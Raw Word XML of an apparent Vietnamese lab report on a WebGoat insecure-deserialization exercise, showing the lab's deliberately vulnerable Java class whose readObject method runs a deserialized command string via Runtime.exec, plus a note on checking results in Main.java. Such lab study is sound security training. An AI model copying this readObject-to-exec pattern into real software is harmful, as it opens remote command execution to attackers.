    <w:p w14:paraId="0170B8F2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</w:p>
    <w:p w14:paraId="5C73D036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>public class VulnerableTaskHolder implements Serializable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62079F94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</w:p>
    <w:p w14:paraId="5981CEA6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private static final long serialVersionUID = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E1A6FF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</w:p>
    <w:p w14:paraId="62D065AB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private String taskName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD93393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private String taskAction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C822A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private LocalDateTime requestedExecutionTime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A7786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</w:p>
    <w:p w14:paraId="1B0829AC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public VulnerableTaskHolder(String taskName, String taskAction) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233364BB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super();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AC2B16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this.taskName = taskName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD939B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this.taskAction = taskAction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73146604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this.requestedExecutionTime = LocalDateTime.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A96F2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759DA68A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</w:p>
    <w:p w14:paraId="3C0AFA3D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@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2EC49D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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public String toString() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79397554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return "org.dummy.insecure.framework.VulnerableTaskHolder [taskName=" + taskName + ", taskAction=" + taskAction + ", requestedExecutionTime="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56FD7F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    + requestedExecutionTime + "]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047ACDB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF1E7A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</w:p>
    <w:p w14:paraId="5701351D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/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F910B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* Execute a task when de-serializing a saved or received object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C4856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* @author stupid develop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267FCFF4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*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10598CC6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private void readObject( ObjectInputStream stream ) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A4632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//unserialize data so taskName and taskAction are available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3C3D5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stream.defaultReadObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDC89C9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</w:p>
    <w:p w14:paraId="369EC1D5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//do something with the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037ECBBE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System.out.println("restoring task: "+taskName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325AF6D1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System.out.println("restoring time: "+requestedExecutionTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BB6BA4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</w:p>
    <w:p w14:paraId="3F1D69DD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if (requestedExecutionTime!=null &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667323B7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    (requestedExecutionTime.isBefore(LocalDateTime.now().minusMinutes(10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E1AEA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            || requestedExecutionTime.isAfter(LocalDateTime.now()))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB7162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//do nothing is the time is not within 10 minutes after the object has been created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C95F11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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            System.out.println(this.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050FE4C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throw new IllegalArgumentException("outdated");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E386B66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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257CEDF7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</w:p>
    <w:p w14:paraId="44C1E244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//condition is here to prevent you from destroying the goat altogether</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1213C2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if ((taskAction.startsWith("sleep")||taskAction.startsWith("ping"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198CD724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    &amp;&amp; taskAction.length() &lt; 22) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B263580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System.out.println("about to execute: "+taskAction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF5CE6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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB9E85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    Process p = Runtime.getRuntime().exec(taskAction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FD52A6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    BufferedReader in = new BufferedReader(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E586760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            new InputStreamReader(p.getInputStream()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708282C6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    String line = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DFC8E9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    while ((line = in.readLine()) != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B6A88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        System.out.println(line);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2E616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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31618514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} catch (IOException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B14C1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    e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697E457" w14:textId="77777777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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585DC56" w14:textId="6B403868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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F47D2" w14:textId="128DF6C2" w:rsidR="00CA4F77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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B57FE" w14:textId="19C0D602" w:rsidR="001E4836" w:rsidRPr="00F94EB4" w:rsidRDefault="00CA4F77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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DED7AE" w14:textId="7E84857B" w:rsidR="008814C6" w:rsidRPr="00F94EB4" w:rsidRDefault="008814C6" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thêm 1 số cải tiến về code để check kết quả trên Console ở Main.java giúp ta nhanh chóng lấy kết quả request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2F1042" w14:textId="77308F79" w:rsidR="00B456C3" w:rsidRPr="00F94EB4" w:rsidRDefault="00B456C3" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72FFE444" wp14:editId="596ECD5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0BF2" w14:textId="67624166" w:rsidR="00CD12F2" w:rsidRPr="00F94EB4" w:rsidRDefault="00CD12F2" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F73C716" wp14:editId="3FCBE47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F4F0" w14:textId="49AF1A39" w:rsidR="007C4B98" w:rsidRPr="00F94EB4" w:rsidRDefault="007C4B98" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007C4B98" w:rsidRPr="00F94E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79E9E9" w14:textId="77777777" w:rsidR="00634412" w:rsidRDefault="00634412" w:rsidP="00501041">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="690A3CDC" w14:textId="77777777" w:rsidR="00634412" w:rsidRDefault="00634412" w:rsidP="00501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AA7A74" w14:textId="77777777" w:rsidR="00634412" w:rsidRDefault="00634412" w:rsidP="00501041">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F57F055" w14:textId="77777777" w:rsidR="00634412" w:rsidRDefault="00634412" w:rsidP="005010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156"/>
    <w:rsid w:val="000221CB"/>
    <w:rsid w:val="00051B2A"/>
    <w:rsid w:val="00067BB5"/>
    <w:rsid w:val="00072554"/>
    <w:rsid w:val="00072B8A"/>
    <w:rsid w:val="001E4836"/>
    <w:rsid w:val="002710FC"/>
    <w:rsid w:val="002D1E13"/>
    <w:rsid w:val="003170B2"/>
    <w:rsid w:val="0033648A"/>
    <w:rsid w:val="00431BAB"/>
    <w:rsid w:val="00501041"/>
    <w:rsid w:val="005D79F4"/>
    <w:rsid w:val="00634412"/>
    <w:rsid w:val="006820F0"/>
    <w:rsid w:val="00684C43"/>
    <w:rsid w:val="007377CF"/>
    <w:rsid w:val="007C4B98"/>
    <w:rsid w:val="00810156"/>
    <w:rsid w:val="00827FDC"/>
    <w:rsid w:val="0085521B"/>
    <w:rsid w:val="008814C6"/>
    <w:rsid w:val="00895575"/>
    <w:rsid w:val="00944073"/>
    <w:rsid w:val="00947BF5"/>
    <w:rsid w:val="009521DE"/>
    <w:rsid w:val="00A71E02"/>
    <w:rsid w:val="00B456C3"/>
    <w:rsid w:val="00B9281A"/>
    <w:rsid w:val="00CA4F77"/>
    <w:rsid w:val="00CD12F2"/>
    <w:rsid w:val="00D247B2"/>
    <w:rsid w:val="00D670C8"/>
    <w:rsid w:val="00DF39D8"/>
    <w:rsid w:val="00F13DB3"/>
    <w:rsid w:val="00F93780"/>
    <w:rsid w:val="00F94EB4"/>
    <w:rsid w:val="00F95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D7B81"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{94C19C00-71D7-4F58-8ED1-76C1AA40C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1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041"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00501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041"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0050104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50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9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5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14</Pages>
  <Words>960</Words>
  <Characters>5475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45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-21T04:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-21T18:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>